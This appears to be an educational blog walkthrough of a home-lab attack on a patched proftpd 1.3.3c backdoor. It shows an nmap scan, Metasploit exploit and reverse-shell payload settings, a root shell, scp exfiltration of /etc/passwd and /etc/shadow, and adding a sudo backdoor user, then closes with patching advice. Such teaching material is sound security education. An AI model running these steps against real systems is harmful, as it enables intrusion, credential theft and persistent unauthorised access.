Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen. Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date. We’ll go through the steps threat actors use to infiltrate a system: Reconnaissance Scanning Obtaining Access Exfilitrating data Maintaining Persistence Pivoting Lab Environment The local home lab provides everything we need for this walkthrough. Vulnerable Linux Machine - Ubuntu 16.04 proftpd 1.3.3c Apache HTTP OpenSSH Attacking Machine - Ubuntu Server 22.04 Nmap Metasploit These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited. Scanning with Nmap This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs. -sV $ nmap -sV 10.10.10.172 The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the software on Port 21. proftpd 1.3.3c Port Protocol State Service Version 21 tcp open ftp proftpd 1.3.3c 22 tcp open ssh OpenSSH 7.2p2 80 tcp open http Apache 2.4.18 The software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service. proftpd 1.3.3c Researching Vulnerabilities We could use Google to learn more about the vulnerabilities in the server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities. proftpd 1.3.3c Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors. Launching Metasploit Find installation and start the Metasploit framework as root with the following command. instructions for Metasploit in the documentation $ sudo msfconsole Search the Database for Known Exploits Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the command from the Metasploit command line. We are going to use this database to find vulnerabilities and known exploits. search proftpd 1.3.3c msf6> search proftpd 1.3.3c The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server. Gaining System Access Let’s begin initial access to the server by configuring our attack by typing use exploit/unix/ftp/proftpd_133c_backdoor or simply the module ID number, use 0. msf6 > use exploit/unix/ftp/proftpd_133c_backdoor Use the command to display the payloads available for the proftpd_133c_backdoor module. show payloads msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads From the available payloads for the proftpd_133c_backdoor exploit, we are interested in , the . Set the option using the payload number or the full command as follows: Option 5 payload/cmd/unix/reverse_perl command msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.10.172 The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 10.10.10.171 The Metasploit configuration is complete. Run the exploit with the command. exploit msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system. whoami At this point, the system is compromised and you can do whatever you want. Gaining a Shell To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell. python3 -c 'import pty; pty.spawn("/bin/bash")' Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data. Data Exfiltration Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration. The Linux file contains a list of system users, combined with the file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network. /etc/password /etc/shadow Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use (secure copy) to copy the password and shadow files to our remote server. scp And /etc/shadow We exfiltrated and to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files. /etc/passwd /etc/shadow Usernames and Passwords Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. and are two well-known password cracking tools that can quickly reveal username/password combinations. John the Ripper Hashcat Maintaining Persistence Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user. root@vtsec:/# adduser badguy And give them superuser access. root@vtsec:/# usermod -aG sudo badguy In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time. How to Protect Your Network This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use. Although it’s unlikely to find the vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services. proftpd 1.3.3c
